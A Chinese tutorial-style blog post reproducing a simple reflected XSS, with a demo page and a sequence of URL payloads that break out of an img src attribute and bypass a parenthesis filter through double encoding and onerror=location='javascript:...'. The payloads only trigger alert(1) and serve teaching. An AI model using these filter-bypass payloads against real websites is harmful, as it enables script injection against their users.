简单反射型XSS的复现

xss反射型攻击:

1.最简单的漏洞复现:

这里我们有一个最简单的网页:由于地址不存在,所以图片加载不出来。

复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="aaaa" onerror="alert(1)" alt="error">
</body>
</html>

首先我们要知道onerror函数有什么作用:捕获页面错误信息并调用函数

我们先写一个最简单的xss,发现在源代码上面出现在了scr

复制代码
?xss=aaaaaa

所以接下来尝试用"闭合

复制代码
?xss=aaaaa" onerror="alert(1)

可以看到这里没有编译括号,所以是后台把括号过滤了

接下来就尝试对括号进行编码,(的编码是%28)的编码是%29

复制代码
?xss=aaaaa" onerror="alert%281%29

可以发现还是没有任何变化,原因是因为浏览器会在进行编码之后才给到函数运行,所以在函数执行之前又会变回括号一样被过滤。

所以为了避免被浏览器编码,我们可以进行二次编码,把%编码成%25

复制代码
?xss=aaaaa" onerror="alert%25281%2529

发现依然不行,想起来js编码不能替换符号,所以这里要用到location,作用是将符号,变量名,函数名都变成字符串,就可以进行js编码了。

复制代码
?xss=aaaaa" onerror= location="javascript:alert%25281%2529

可以看出已经可以了。

相关推荐
问心无愧051331 分钟前
ctf show web 入门152
前端·笔记
kyriewen32 分钟前
Copilot下个月按Token收钱,我算了一笔账:重度用户一年要多花3000块
前端·javascript·openai
还有多久拿退休金1 小时前
dnd-kit 碰撞检测算法:你的订单为什么自己"跑"到了 1 号?
前端
qq_316837751 小时前
npm run tauri build Downloading下载超时
前端·npm·node.js
w_t_y_y1 小时前
VUE3(二)VUE2和VUE3区别
前端·javascript·vue.js
T-shmily1 小时前
使用svg图标
前端·css
阿明在折腾1 小时前
在浏览器里实现 PDF 合并与拆分:pdf-lib 实战指南
前端·javascript
米高梅狮子1 小时前
03.OpenStack使用
linux·前端·云原生·容器·架构·kubernetes·openstack
时光不负努力1 小时前
手写三大核心:Promise、Event Bus、深拷贝
前端
星栈1 小时前
被Leptos弹窗逼疯后,我搞了一套零Props方案
前端·前端框架·全栈